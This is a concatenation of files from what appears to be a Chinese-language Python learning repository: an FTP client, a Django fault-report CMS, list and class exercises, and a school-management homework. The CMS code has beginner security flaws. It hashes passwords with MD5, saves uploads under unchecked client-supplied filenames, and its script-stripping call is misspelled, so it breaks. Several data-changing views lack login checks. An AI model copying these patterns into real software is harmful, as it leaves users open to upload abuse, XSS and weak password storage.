self.client.connect((self.host,self.port)) def login(self): userinfo = [] while True: username = input('请输入你的用户名:') userinfo.append(username) pwd = input('请输入你的密码:') # userinfo.append(pwd) hash_user = hashlib.md5(username.encode('utf-8')) hash_pwd = hash_user.update(pwd.encode('utf-8')) md5_pwd = hash_user.hexdigest() userinfo.append(md5_pwd) userinfo_byttes = bytes(json.dumps(userinfo), encoding='utf-8') # 把列表转换成bytes while True: self.client.send(userinfo_byttes) ret = self.client.recv(1024).decode('utf-8') print(ret) if ret=='true': client.command() else: client.login() # self.client.close() def command(self): while True: data=input('>>: ').strip() #get a.txt if not data:continue params=data.split() #parmas=['get','a.txt'] cmd=params[0] #cmd='get' if hasattr(self,cmd): func=getattr(self,cmd) func(params) #func(['get','a.txt']) def get(self,params): params_json=json.dumps(params) self.client.send(params_json.encode('utf-8')) # 1、先接收报头的长度 headers_size = struct.unpack('i', self.client.recv(4))[0] # 2、再收报头 headers_bytes = self.client.recv(headers_size) headers_json = headers_bytes.decode('utf-8') headers_dic = json.loads(headers_json) print('========>', headers_dic) filename = headers_dic['filename'] filesize = headers_dic['filesize'] filepath = os.path.join(DOWNLOAD_DIR, filename) # 3、再收真实的数据 with open(filepath, 'wb') as f: recv_size = 0 while recv_size < filesize: line = self.client.recv(1024) recv_size += len(line) f.write(line) print('===>下载成功') if __name__ == '__main__': client=FtpClient('127.0.0.1',8080) client.login()<file_sep>/day2/郑朝晖.py goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998}] flag = True buyProduct = dict() buyNumCode = [] money = int(input("请输入你的存额:")) while flag: print('%s %s %s' % ('商品编号', '商品名称', '商品价格')) for numCode in range(len(goods)): product = goods[numCode] print('%(id)5d %(name)7s %(price)8d' % {'id': numCode, 'name': product.get("name"), 'price': product.get("price")}) numCode = int(input("请选择你要购买商品编号:")) count = int(input("请输入你要购买的数量:")) buyTotal = goods[numCode].get("price") * count if buyTotal > money: choiceYN = input("你的余额不足,是否选择购买其它商品,Y/N:") if choiceYN == "Y" or choiceYN == "Y".lower(): continue else: flag = False else: money -= buyTotal if numCode in buyNumCode: count = buyProduct.get(numCode).get("count") + count buyProduct.get(numCode).update(count=count) else: buyNumCode.append(numCode) buyProduct.update({numCode: {"name": goods[numCode].get("name"), "price": goods[numCode].get("price"), "count": count}}) choiceYN = input("你还需要购买其它商品吗,Y/N: ") if choiceYN == "Y" or choiceYN == "Y".lower(): continue else: break if len(buyProduct) == 0: print("你没有购买任何商品,你的金额为:{}".format(money)) else: consumeTotal = 0 print("你购买的商品为:") print("{:^} {:^} {:^} {:^}".format("商品名称", "商品价格", "商品数量", "商品价格")) for k, v in buyProduct.items(): print('{:>4s} {:>6d} {:>8d} {:>8d}'.format(v.get("name"), v.get("price"), v.get("count"), v.get("price") * v.get("count"))) consumeTotal = consumeTotal + v.get("price") * v.get("count") print("你总共花费金额为:{},还剩金额为:{}".format(consumeTotal, money))<file_sep>/day21/CMS/fault_reporting/views.py from django.shortcuts import render, redirect, HttpResponse from django import views from django.contrib import auth # auth认证模块 import random from fault_reporting import forms # 用forms注册 from fault_reporting import models from django.db import transaction # 事务操作模块 from django.http import JsonResponse # json格式 from django.contrib.auth.decorators import login_required # auth装饰器 from bs4 import BeautifulSoup # 用来清洗数据 from django.db.models import F # F查询,需要对数据库里面的字段计算 import os from fault_reporting import mypage # 分页功能 from django.db.models import Count # 计算数据库里面的数字 # Create your views here. class LoginView(views.View): ''' 如果用户发送的是get就返回登录页面 如果是post请求,先获取用户想访问那个页面用next,然后让他输入用户名密码还有验证码,先验证 用户名和密码,然后再判断验证码是否正确,如果都是正确的,就跳转到用户访问的那个页面 ''' def get(self, request): return render(request, "login.html") def post(self, request): next_url = request.GET.get("next", "/index/") username = request.POST.get("username") pwd = request.POST.get("<PASSWORD>") v_code = request.POST.get("vcode", "").upper() # 如果用户不写验证码就是空 if v_code == request.session.get("v_code"): user_obj = auth.authenticate(username=username, password=pwd) if user_obj: auth.login(request, user_obj) # auth认证登录 return redirect(next_url) else: return render(request, "login.html", {"error_msg": "用户名或密码错误"}) else: return render(request, "login.html", {"error_msg": "验证码错误"}) def logout(request): ''' 注销用auth模块,然后跳转到登录页面 :param request: :return: ''' auth.logout(request) return redirect("/login/") # 首页 def index(request, *args): ''' index可以传参数类似 --/lob/视频/--格式的参数 args[1]代表第二个参数,0代表第一个 首先分别取到业务,标签,时间的个数,然后点击不同的业务,标签,或时间跳转属于自己的内容界面 时间这里加上了try except捕获异常,因为怕用户输入的时间日期,不符合格式,如果没有这个日期则返回空 统计数量用的是orm的聚合查询需要先导入count :param request: :param args: :return: ''' # 取到所有的故障总结 report_list = models.FaultReport.objects.all() # 分页功能 total_count = report_list.count() # 总数量 current_page = request.GET.get("page") # 当前页 page_obj = mypage.MyPage(current_page, total_count, url_prefix="index") page_html = page_obj.page_html() # 显示页码的代码 range = report_list[page_obj.start:page_obj.end] # 如果有参数,并且参数长度是2 if args and len(args) == 2: # 进入细分查询 if args[0] == "lob": # 按业务线查询, report_list = report_list.filter(lob__title=args[1]) # args[1]指的是视频等业务 total_count = report_list.count() # 总数量 current_page = request.GET.get("page") # 当前页 page_obj = mypage.MyPage(current_page, total_count, url_prefix="fault-report/lob/args[1]") page_html = page_obj.page_html() # 显示页码的代码 try: range = report_list[page_obj.start:page_obj.end] except Exception: return HttpResponse("此选项没有内容") elif args[0] == "tag": # 是按照标签查询 report_list = report_list.filter(tags__title=args[1]) total_count = report_list.count() # 总数量 current_page = request.GET.get("page") # 当前页 page_obj = mypage.MyPage(current_page, total_count, url_prefix="fault-report/tag/args[1]") page_html = page_obj.page_html() # 显示页码的代码 try: range = report_list[page_obj.start:page_obj.end] except Exception: return HttpResponse("此选项没有内容") else: # 按照日期(年月)来查询 try: year, month = args[1].split("-") # 以-切割,取出年和月 print(year) report_list = report_list.filter(create_time__year=year, create_time__month=month) total_count = report_list.count() # 总数量 current_page = request.GET.get("page") # 当前页 page_obj = mypage.MyPage(current_page, total_count, url_prefix="fault-report/archive/args[1]") page_html = page_obj.page_html() # 显示页码的代码 try: range = report_list[page_obj.start:page_obj.end] except Exception: return HttpResponse("此选项没有内容") except Exception: report_list = [] # 聚合查询业务线 ,title是LOB表里的title,获取业务线后面括号里的数字 lob_list = models.LOB.objects.all().annotate(num=Count("faultreport")).values("title", "num") # 正常查询 # lob_list = models.LOB.objects.all() # 取到所有标签 # tag_list=models.Tag.objects.all() # 分组获取标签,获取标签分类括号里面的数字 tag_list = models.Tag.objects.all().annotate(num=Count("faultreport")).values("title", "num") # 拿到一个日期归档数据 archive_list = models.FaultReport.objects.all().extra( select={"ym": "strftime('%%Y-%%m', create_time)"} ).values("ym").annotate(num=Count("id")).values("ym", "num") # return render(request, "index.html", locals(),{"report_list":range}) return render(request, "index.html", {"report_list": range, "page_html": page_html, "lob_list": lob_list, "tag_list": tag_list, "archive_list": archive_list}) # 验证码路径 def vcode(request): from PIL import Image, ImageDraw, ImageFont # 导入绘图模块 # 定义一个生成随机颜色代码的函数 def random_color(): return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255) # 创建一个随机背景颜色的图片对象 image_obj = Image.new( "RGB", (250, 35), # 背景图片的长和宽 (255, 255, 140) ) # 在该图片对象上生成一个画笔对象 draw_obj = ImageDraw.Draw(image_obj) # 加载一个字体对象 font_obj = ImageFont.truetype('static/font/kumo.ttf', 28) # 字体大小 tmp = [] for i in range(5): l = chr(random.randint(97, 122)) # 生成随机的小写字母 u = chr(random.randint(65, 90)) # 生成随机的大写字母 n = str(random.randint(0, 9)) # 生成一个随机的数字 # 从上面三个随机选一个 r = random.choice([l, u, n]) # 将选中过的那个字符写到图片上 draw_obj.text((30 * i + 30, 0), r, fill=random_color(), font=font_obj) # text指定的是从那开始写位置,fill是字体颜色 tmp.append(r) v_code = "".join(tmp).upper() # 将生成的验证码保存 request.session["v_code"] = v_code # 直接在内存中保存图片替代io操作 from io import BytesIO f1 = BytesIO() image_obj.save(f1, format="PNG") # 将背景图片保存到f1里面 img_data = f1.getvalue() # 去f1取图片 return HttpResponse(img_data, content_type="image/png") # 注册 class RegisterView(views.View): ''' 如果是get请求,就返回注册页面,用的form写的注册页面,先导入刚才写的forms模块,然后调用RggisterForm 如果是post请求(就是提交请求),form_obj获取到用户填的所有内容,然后去校验数据格式是否正确,如果没问题,就去 数据库里面创建数据,创建之前,要先删除re_password这个字段,因为数据库里没有这个字段 然后接受头像文件,需要用request.FILES,去获取 最后去数据库保存,需要把你的普通数据和头像数据分开来存储。 注册成功之后,就跳转到登录界面,否则就报报错信息返回到页面上面 ''' def get(self, request): form_obj = forms.RegisterForm() return render(request, "register.html", locals()) def post(self, request): res = {"code": 0} form_obj = forms.RegisterForm(request.POST) if form_obj.is_valid(): # 数据没问题,去数据库创建记录 form_obj.cleaned_data.pop("re_password") # 头像数据,文件对象 avatar_obj = request.FILES.get("avatar") # 头像文件保存到数据库,如果你的models里面写的这个字段FileField,就会自动写在服务器上面 models.UserInfo.objects.create_user(**form_obj.cleaned_data, avatar=avatar_obj) res["url"] = "/login/" else: # 数据有问题 res["code"] = 1 res["error"] = form_obj.errors return JsonResponse(res) # 编辑注册信息 def edit_register(request): user_obj = models.UserInfo.objects.filter(username=request.user).first() # 获取你要编辑的用户 if request.method == "POST": # 获取新的字段 new_name = request.POST.get("name") new_phone = request.POST.get("phone") new_email = request.POST.get("email") avatar_obj = request.FILES.get("avatar") # print(avatar_obj) # 数据库更改字段 user_obj.username = new_name user_obj.phone = new_phone user_obj.email = new_email user_obj.avatar = avatar_obj print(user_obj.avatar) user_obj.save() return redirect("/fault-report/info/") return render(request, "edit_register.html", locals()) def change_password(request): ''' 更改密码 首先获取用户名,当用户要改密码的时候让他先输入旧密码,然后在输入两次新密码,当点击提交的时候,会先检查旧密码 是否正确,如果是正确的就检查两次输入的新密码是否正确,如果两次新密码输入正确就保存,然后跳转到登录界面。如果旧密码不正确, 就提示错误。,两次新密码不一致也提示错误 :param request: :return: ''' # 获取用户名 user = auth.get_user(request) state = None if request.method == 'POST': old_password = request.POST.get('old_password', '') new_password = request.POST.get('new_password', '') repeat_password = request.POST.get('repeat_password', '') if user.check_password(old_password): if not new_password: state = 'empty' elif new_password != repeat_password: state = '两次密码不一致' return render(request, "change_password.html", {"error_new": state, "v": user}) else: user.set_password(new_password) user.save() return redirect("/login/") else: state = '原始密码不对' return render(request, "change_password.html", {"error_old": state, "v": user}) return render(request, 'change_password.html', {"v": user}) # 个人中心 @login_required # 用auth自带的装饰器,需要去setting.py里面设置一下路径 def info(request): # 把当前这个用户发布的所有内容故障总结展示出来 report_list = models.FaultReport.objects.filter(user=request.user) return render(request, "info.html", locals()) # 故障详情页面 def report_detail(request, report_id): # 根据id值去数据库中找到对应的那个故障总结 report = models.FaultReport.objects.filter(id=report_id).first() if not report: return HttpResponse("404") return render(request, "report_detail.html", {"report": report}) # 点赞 def updown(request): res = {"code": 0} # print(request.user) #获取用户名 # print(request.user.username) #获取用户名 # 获取用户id user_id = request.POST.get("user_id") # 获取点赞文章id report_id = request.POST.get("report_id") # 获取是点反对还是支持 # is_up=request.POST.get("report_id") # 获取的true和false是字符串,要转换成python里面的true和false is_up = True if request.POST.get("is_up") == "true" else False # 2. 每个人只能给一篇文章点一次推荐或者点一次反对 等于号前面的字段是updonw数据库里面的字段 is_exist = models.UpDown.objects.filter(user_id=user_id, fault_report_id=report_id).first() if models.FaultReport.objects.filter(user_id=user_id, id=report_id): # 如果是自己给自己点赞 res["code"] = 1 res["msg"] = "不能支持自己的文章" if is_up else "不能反对自己的文章" elif is_exist: # 如果有记录就代表以及点过了 res["code"] = 1 res["msg"] = "你已经推荐过" if is_exist.is_up else "你已经反对过" else: # 数据没问题,去数据库里面创建数据 # 因为点赞表创建了新纪录同时还要更新故障总结表的点赞字段,涉及到事务操作 with transaction.atomic(): # 创建点赞记录去updown表里面 models.UpDown.objects.create( user_id=user_id, fault_report_id=report_id, is_up=is_up ) # 去更新对应的故障总结里面的点赞数 if is_up: # 如果为真,点赞 # 先找到这篇文章,然后去更新她的up_count字段 models.FaultReport.objects.filter(id=report_id).update(up_count=F('up_count') + 1) else: models.FaultReport.objects.filter(id=report_id).update(down_count=F("down_count") + 1) # 事务操作结束 res["msg"] = "支持成功" if is_up else "反对成功" return JsonResponse(res) # 评论 def comment(request): ''' 首先取到由ajax发送过来的评论数据,包括文章id,评论内容,父评论,如果没有父id,就创建新的一条评论, 如果有父id,就创建一个子评论,并且同时去更新faultreport里面的评论数 :param request: :return: ''' res = {"code": 0} # 取到用户发送的评论数据,下面这三个数据是ajax给发送过来的 report_id = request.POST.get("report_id") content = request.POST.get("content") parent_id = request.POST.get("parent_id", None) # 获取父评论id # 去数据库创建一条新的评论 with transaction.atomic(): if not parent_id: comment_obj = models.Comment.objects.create( fault_report_id=report_id, # 故障id user=request.user, # 用户 content=content, # 评论的内容 ) # 否则就创建一条子评论 else: comment_obj = models.Comment.objects.create( fault_report_id=report_id, user=request.user, content=content, parent_comment_id=parent_id, ) # 同时去更新评论数 models.FaultReport.objects.filter(id=report_id).update(comment_count=F("comment_count") + 1) # 把res返回给ajax,然后ajax根据返回的内容,自动刷新评论的内容,然后显示在网页上 res["data"] = { "id": comment_obj.id, "n": models.Comment.objects.filter(fault_report_id=report_id).count(), # 有多少条数据就有几楼 "create_time": comment_obj.create_time.strftime("%Y-%m-%d %H:%M:%S"), "user": comment_obj.user.username, "content": comment_obj.content } # print(res) return JsonResponse(res) # 把res的结果返回给ajax # 添加故障 def add_report(request): if request.method == "POST": content = request.POST.get("content") # 获取文章内容 soup = BeautifulSoup(content, "html.parser") print(soup) # 把提交的内容包含有script的标签清洗掉 for i in soup.find_all("script"): # 遍历所有的script标签,删除掉 i.decompost() with transaction.atomic(): # 先创建一条故障总结记录 report_obj = models.FaultReport.objects.create( title=request.POST.get("title"), # 简介 desc=soup.text[0:150], # 只去html代码的文本内容 lob_id=request.POST.get("lob"), user=request.user ) # 创建一条故障总结详情记录 models.FaultDetail.objects.create( content=soup.prettify(), # 格式化完整的html内容 fault_id=report_obj.id ) return redirect("/fault-report/info/") lobs = models.LOB.objects.all() # 业务线 return render(request, "add_report.html", locals()) # 编辑故障 def edit_report(request, report_id): if request.method == "POST": new_title = request.POST.get("title") new_lob_id = request.POST.get("lob") new_content = request.POST.get("content") soup = BeautifulSoup(new_content, "html.parser") # 把提交的内容包含有script的标签清洗掉 for i in soup.find_all("script"): # 遍历所有的script标签,删除掉 i.decompost() with transaction.atomic(): report_obj = models.FaultReport.objects.filter(id=report_id).update( title=request.POST.get("title"), # 简介 desc=soup.text[0:150], # 只去html代码的文本内容 lob_id=request.POST.get("lob"), user=request.user ) # 创建一条故障总结详情记录,当你用了.first的时候不能用.update了,queeyset才可以用.update models.FaultDetail.objects.filter(fault_id=report_id).update( content=soup.prettify(), # 格式化完整的html内容 fault_id=report_id ) return redirect("/fault-report/info/") report_obj = models.FaultReport.objects.filter(id=report_id).first() lobs = models.LOB.objects.all() return render(request, "edit_report.html", locals()) # 删除故障信息 def del_report(request, report_id): with transaction.atomic(): models.FaultReport.objects.filter(id=report_id).delete() # 创建一条故障总结详情记录 models.FaultDetail.objects.filter(fault_id=report_id).delete() return redirect("/fault-report/info/") # 富文本编辑器上传图片的视图 def upload_img(request): print(request.FILES) res = {"error": 0} # 这是固定写法,必须用error file_obj = request.FILES.get("imgFile") file_path = os.path.join("upload", "report_images", file_obj.name) # 将文件保存在本地 with open(file_path, "wb") as f: for chunk in file_obj.chunks(): f.write(chunk) # 将上传文件的url返回给富文本编辑器 res["url"] = "/media/report_images/{}".format(file_obj.name) return JsonResponse(res) <file_sep>/day2/day4作业.py #li = ['alex','wusie','eric','rain','alex'] ''' #1)计算列表的长度并输出 print(len(li)) #2)列表中追加元素’seven’,并输出添加后的列表 li.append('senven') print(li) #33)请在列表的第1个位置插入元素’Tony’,并输出添加后的列表 li.insert(0,'Tony') print(li) #4)请修改列表第2个位置的元素为’Kelly’,并输出修改后的列表 li[1] = 'kelly' print(li) #5)请将列表l2=[1,’a’,3,4,’heart’]的每一个元素添加到列表li中,一行代码实现,不允许循环添加。 l2=[1,'a',3,4,'heart'] li.extend(l2) print(li) ''' #7)请删除列表中的元素’eric’,并输出添加后的列表 # li.remove('eric') # print(li) #8)请删除列表中的第2个元素,并输出删除的元素和删除元素后的列表 # print(li.pop(2)) # print(li) #9)请删除列表中的第2至4个元素,并输出删除元素后的列表 # del li [1:4] # print(li) #10)请将列表所有得元素反转,并输出反转后的列表 # li.reverse() # print(li) #11)请计算出‘alex’元素在列表li中出现的次数,并输出该次数。 #print(li.count('alex')) ''' lis= [2,3,'k',['qwe',20,['k1',['tt',3,'1']],89],'ab','adv'] #1)将列表lis中的’tt’变成大写(用两种方式)。 # print(lis[3]) # print(lis[3][2][1][0].upper()) ##第一种 # lis[3][2][1][0] = "TT" ##第二种 # print(lis[3][2][1][0]) #2)将列表中的数字3变成字符串’100’ lis[1] = 100 print(lis[1]) #3)将列表中的字符串’1’变成数字101 #第一种方法 # lis[3][2][1][2] = "101" # print(lis[3][2][1][2]) #第二种方法: lis[3][2][1][2] = int(lis[3][2][1][2]) + 100 print(lis[3][2][1][2]) ''' # li = ['alex','eric','rain'] # #利用下划线将列表的每一个元素拼接成字符串"alex_eric_rain" # b = "_".join(li) # print(b) ''' ##7循环打印列表中的每个元素,遇到列表则再循环打印出它里面的元素。 li = [1,3,4,'alex',[3,7,8,'taibai'],5,'ritian'] for i in li: #print(type(i)) print(i) if type(i) == list: for g in i: print(g) ''' ''' ##5 替换敏感词汇 li = ["苍老师", "东京热","武藤兰", "波多野结衣"] new_list=[] m = input("请输入你的评论:") for i in li: if m == i: print("你输入的有敏感词汇") m = m.replace(i,'...') new_list.append(m) else: new_list.append(m) print(new_list) ''' ''' #6 查找列表li中的元素,移除每个元素的空格,并找出以’A’或者’a’开头,并以’c’结尾的所有元素, # 并添加到一个新列表中,最后循环打印这个新列表。 li = ['taibai','alex','ABC','egon', 'Ritian','Wusir', ' aqc'] new_list = [] for i in li: b = (i.strip()) if b.startswith("a") or b.startswith("A"): if b.endswith('c'): new_list.append(b) print(new_list) '''<file_sep>/day2/小数据池.py #赋值运算,它们共用一个列表 # a = [1,2,3] # b = a # a.append(666) # print(a,b) #浅copy #对于浅copy来说,第一层创建的是新的内存地址,而从第二层开始, # 指向的都是同一个内存地址,所以,对于第二层以及更深的层数来说,保持一致性 l1 = [1,2,3] l2 = l1.copy() l1.append(666) print(l1,l2) print(id(l1),id(l2)) l1 = [1,2,3,[22,33]] ##这里因为[22,33]属于第二层,所以两个列表都一样 l2 = l1.copy() l1[-1].append(666) print(l1,l2) print(id(l1[-1]),id(l2[-1])) #深copy 对于深copy来说,两个是完全独立的,改变任意一个的任何元素(无论多少层),另一个绝对不改变。 import copy l1 = [1,2,3,[22,33]] l2 = copy.deepcopy(l1) l1[-1].append(666) print(l1,l2) print(id(l1[-1]),id(l2[-1])) # # id == is a = 'alex' b = 'alex' print(a == b) # 数值 print(a is b) # 内存地址 print(id(a)) #python中 有小数据池的概念。 # int -5 ~256 的相同的数全都指向一个内存地址,节省空间。 # str:s = 'a' * 20 以内都是同一个内存地址 #只要字符串含有非字母元素,那就不是一个内存地址 <file_sep>/模板/auto - 2 - 固定二级菜单示例/auto - 2 - 固定二级菜单示例/web/views/home.py from django.shortcuts import render from web import models # from django.conf import settings def add_user(request): # menus = settings.MENU_LIST return render(request, 'add_user.html') def add_order(request): # menus = settings.MENU_LIST return render(request, 'add_order.html') def userlist(request): data=models.User.objects.all return render(request, 'userlist.html',{'user_list':data}) def orderlist(request): return render(request, 'orderlist.html') <file_sep>/day8/模块/my_module.py print('my module') money=1000 def func(): print('in func',money) func()<file_sep>/day6/4.初识类的语法.py # 类 : 具有相同属性和相同动作的一类事物 组成一个类,如人类 # 对象 : 具体的某一个具有实际属性 和具体动作的一个实体。如蜘蛛侠就是一个对象 # 类是抽象的 # 对象是具体的 # 类被创造出来 就是模子 是用来描述对象的 # class 类名: # 静态属性 = 123 # def 动态属性(self): # # 在类中的方法的一个默认的参数,但也只是一个形式参数,约定必须叫self # print('-->',self) # # # 只要是写在类名中的名字 不管是变量还是函数名 都不能在类的外部直接调用 # # 只能通过类名来使用它 # # 类名的第一个功能是 —— 查看静态属性 # print(类名.静态属性) # 查看 # 类名.静态属性 = 456 # 修改 # print(类名.静态属性) # 类名.静态属性2 = 'abc'# 增加 # print(类名.静态属性2) # # del 类名.静态属性2 # # print(类名.静态属性2) # print(类名.__dict__) # 类中必要的默认值之外 还记录了程序员在类中定义的所有名字 # 类名可以查看某个方法,但是一般情况下 我们不直接使用类名来调用方法 # print(类名.动态属性) # 类名.动态属性(1) # 类的第二个功能是 —— 实例化(创造对象) # class Person:pass # # alex = Person() # 对象 = 类名() # print(alex) # object # print(Person) # alex name hp dps bag sex # print(alex.__dict__) # # alex.__dict__['name'] = 'alex' # # alex.__dict__['sex'] = '不详' # # alex.__dict__['hp'] = 250 # # alex.__dict__['dps'] = 5 # # alex.__dict__['bag'] = [] # # print(alex.__dict__) # alex.name = 'alex' # 给alex对象添加属性 # alex.hp = 250 # alex.dps = 5 # alex.sex = '不详' # alex.bag = [] # print(alex.__dict__) # class Person: # def __init__(self,name,hp,dps,sex): # self.name = name # self.hp = hp # self.dps = dps # self.sex = sex # self.bag = [] # # alex = Person('alex',250,5,'N/A') # print('alex : ',alex) # print(alex.__dict__) # print(alex.name) # 为什么会执行init中的内容? # self到底是什么? # 实例化的过程 # 类名()就是实例化 # 在实例化的过程中 发生了很多事情是外部看不到的 # 1.创建了一个对象 # 2.自动调用__init__方法 # 这个被创造的对象会被当做实际参数传到__init__方法中,并且传给第一个参数self # 3.执行init方法中的内容 # 4.自动的把self作为返回值 返回给实例化的地方 # class Person: # def __init__(self,name,hp,dps,sex): # self.name = name # self.hp = hp # self.dps = dps # self.sex = sex # self.bag = [] # def attack(self,dog): # dog.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) # # class Dog: # def __init__(self,name,kind,hp,dps): # self.name = name # self.hp = hp # self.dps = dps # self.kind = kind # # def bite(self,person): # person.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) # # alex = Person('alex',250,5,'N/A') # ha2 = Dog('哈士奇','藏獒',15000,200) # ha2.bite(alex) # 简化的方式 # alex.attack(ha2) # Person.attack(alex) # alex.attack(ha2) # Person.attack(alex) # print(alex.attack(ha2)) # Person.attack(alex) # print(ha2.hp) # print('alex : ',alex) # print(alex.__dict__) # print(alex.name) # 对象名.方法名 相当于调用一个函数,默认把对象名作为第一个参数传入函数 # 剩余的其他参数根据我的需求可以随意传 # 已知半径 计算圆形的面积和周长 面向对象的思想完成 # 类 圆 # 属性 半径 # 方法 计算面积 计算周长 计算直径 # pi * r ** 2 # 2*pi*r # from math import pi # class Circle: # def __init__(self,r): # self.r = r # def area(self): # return pi * self.r ** 2 # def perimeter(self): # return self.r *pi * 2 # def r2(self):pass # c1 = Circle(5) # 圆形的周长和面积 # 正方形的周长和面积 # # 每一个角色都有属于自己的 属性 和 方法 # 高可扩展性 可读性 规范性 # 结局不可控 # 类有自己的命名空间 # 对象也有自己的命名空间 # 对象能访问类的命名空间? # 类不能访问对象的命名空间? # class Person: # COUNTRY = '中国人' # 静态属性 # def __init__(self,name): # self.name = name # def eat(self): # print('%s在吃泔水'%self.name) # # alex = Person('alex') # egon = Person('egon') # # print(alex.name) # print(egon.name) # print(alex.COUNTRY) # alex.eat() # Person.eat(alex) # alex ---> Person # 当一个类在创建一个实例的时候 就产生了一个这个实例和类之间的联系 # 可以通过实例 对象 找到实例化它的类 # 但是 类不能找到它的实例化 class Person: COUNTRY = ['中国人'] # 静态属性 Country = '中国人' # 静态属性 def __init__(self,name): self.name = name def eat(self): print('%s在吃泔水'%self.name) alex = Person('alex') egon = Person('egon') # print(alex.Country) # alex.Country = '印度人' # print(alex.Country) # print(egon.Country) # print(Person.Country) # alex.COUNTRY[0] = '印度人' # print(alex.COUNTRY) # print(egon.COUNTRY) # print(Person.COUNTRY) # alex.COUNTRY = ['印度人'] # print(egon.COUNTRY) # print(Person.COUNTRY) # 在访问变量的时候,都先使用自己命名空间中的,如果自己的空间中没有,再到类的空间中去找 # 在使用对象修改静态变量的过程中,相当于在自己的空间中创建了一个新的变量 # 在类的静态变量的操作中 应该使用类名来直接进行操作 就不会出现乌龙问题 # 创建一个类 能够自动计算这个类有创建了多少个实例 # class Foo: # count = 0 # def __init__(self): # Foo.count += 1 # # f1 = Foo() # print(Foo.count) # [Foo() for i in range(10)] # print(Foo.count)<file_sep>/day2/05 tuple.py tu = (11,2,True,[2,3,4],'alex') #查找 for i in tu: print (i) #切片 print (tu[1]) print (tu[:3:2]) print(tu.index(True)) #count 统计 print(tu.count(2)) #len长度 print(len(tu)) #添加 tu[-2].append('99') print (tu)<file_sep>/day6/作业/学校管理系统.py import json import sys import time import os class School: #学校类 def __init__(self,name): self.name=name def creat_class(self): #创建班级 print('欢迎创建班级'.center(50,'#'),'\n') class_name=input("请输入班级名称") class_obj=Classroom(class_name) print("创建班级成功".center(50, '-'), '\n') class_dict = { "班级名称": class_name, } if schoolid == school1: f=open('bj_class_info','a') f.write(json.dumps(class_dict,ensure_ascii=False)+'\n') f.seek(0,2) control_view() else: f = open('sh_class_info', 'a') f.write(json.dumps(class_dict, ensure_ascii=False)+'\n') f.seek(0,2) control_view() def show_class(self):#查看班级 if os.path.isfile('bj_class_info') and os.path.isfile('sh_class_info'): if schoolid == school1: f=open('bj_class_info','r') f.seek(0) print(f.read()) control_view() else: f = open('sh_class_info', 'r') f.seek(0) print(f.read()) control_view() else: print("你还没有创建班级") def creat_course(self): # 创建课程 print('欢迎创建课程'.center(50, '#'), '\n') course_name=input("请输入课程名称") course_time=input("请输入课程周期") course_price=input("请输入课程价格") course_obj=Course(course_name,course_time,course_price) print("创建课程成功:" '\n') courses[course_name]=course_obj course_dict ={"课程名称":course_name, "课程周期":course_time, "课程价格":course_price } if schoolid == school1: f = open('bj_course_info', 'a') f.write(json.dumps(course_dict, ensure_ascii=False)+'\n') f.seek(0,2) control_view() else: f = open('sh_course_info', 'a') f.write(json.dumps(course_dict, ensure_ascii=False)+'\n') f.seek(0,2) control_view() def show_course(self): #查看课程 if os.path.isfile('bj_course_info') and os.path.isfile('sh_course_info'): if schoolid == school1: f = open('bj_course_info', 'r') f.seek(0) print(f.read()) control_view() else: f = open('sh_course_info', 'r') f.seek(0) print(f.read()) control_view() else: print("还没有创建课程") control_view() def create_teacher(self): print("创建讲师".center(50,'#')) teacher_name=input("请输入讲师姓名:") teacher_passwd=input("请输入讲师密码:") teacher_age=input("请输入讲师年龄:") teacher_school=input("请输入讲师所在学校:") teacher_class=input("请输入讲师所在班级:") teacher_course=input("请输入讲师教授的课程:") teacher_obj=(teacher_name,teacher_passwd,teacher_age,teacher_school,teacher_class,teacher_course) print("创建讲师成功:".center(50, '-'), '\n') teachers[teacher_name] = teacher_obj teachers_dic={ "讲师姓名": teacher_name, "讲师密码": <PASSWORD>_passwd, "讲师年龄": teacher_age, "讲师所在学校": teacher_school, "讲师教授课程": teacher_course, "讲师所在班级": teacher_class, } if schoolid == school1: f = open('bj_teacher_info', 'a') f.write(json.dumps(teachers_dic, ensure_ascii=False)+'\n') f.seek(0,2) control_view() else: f = open('sh_teacher_info', 'a') f.write(json.dumps(teachers_dic, ensure_ascii=False)+'\n') f.seek(0,2) control_view() def show_teacher(self): #查看讲师 if os.path.isfile('bj_teacher_info') and os.path.isfile('sh_teacher_info'): if schoolid == school1: f = open('bj_teacher_info', 'r') f.seek(0) print(f.read()) control_view() else: f = open('sh_teacher_info', 'r') f.seek(0) print(f.read()) control_view() else: print("你还没有创建老师") control_view() class Classroom: #班级类 def __init__(self,class_name): self.name=class_name class Course: #课程类 def __init__(self,course_name,course_time,course_price): self.course_name=course_name self.course_time=course_time self.course_price=course_price class Person: def __init__(self,name,passwd,age): self.name=name self.passwd=<PASSWORD> self.age=age class Teacher(Person): def __init__(self,name,passwd,age,teacher_school,teacher_class,teacher_course): Person.__init__(self,name,passwd,age) self.teacher_school=teacher_school self.teacher_course=teacher_course self.teacher_class=teacher_class ##存贮用户登录状态的 user_status = { 'username': None, 'status': False } ##登录函数 def wrapper(f2): def inner(): func1 = str(inner) func2 = str(quit) if func2 in func1: exit() if user_status.get('status'): f2() ##就是被装饰的函数 else: print('\033[1;33m欢迎来到教学管理系统.\033[0m'.center(50,"#"),"\n") print('\033[1;33m注意,请先登录,再操作,超过三次锁定用户\033[0m') b = 0 while b < 3: username = input("\033[1;33m请输入你的用户名:\033[0m") password = input("\033[1;33m请输入你的密码:\033[0m") with open('db\info',encoding='utf-8')as f1: for i in f1: a = (i.split()) if a[0] == username and a[1] == password and a[2] == 'student': user_status['status'] = True print("欢迎%s回来" %(username)) select_school() student_view() return username elif a[0] == username and a[1] == password and a[2] == 'teacher': user_status['status'] = True print("欢迎%s回来" %(username)) select_school() teacher_view() return username elif a[0] == username and a[1] == password and a[2] == 'manage': user_status['status'] = True print("欢迎%s回来" %(username)) select_school() control_view() return username else: print("登录失败,请重新登录,你已经用了%s次" % (b+1)) b += 1 return inner @wrapper def login(): ##这里重新定义一个login函数,因为你如果直接执行装饰器会报错,因为里面传了一个参数 pass #@wrapper def control_view():#管理视图 choice_id = input("\033[1;32m*************************请选择功能********************\n" "0.查看班级" "1.创建班级" "2.创建课程" "3.查看课程" "4.创建讲师" "5.查看讲师" 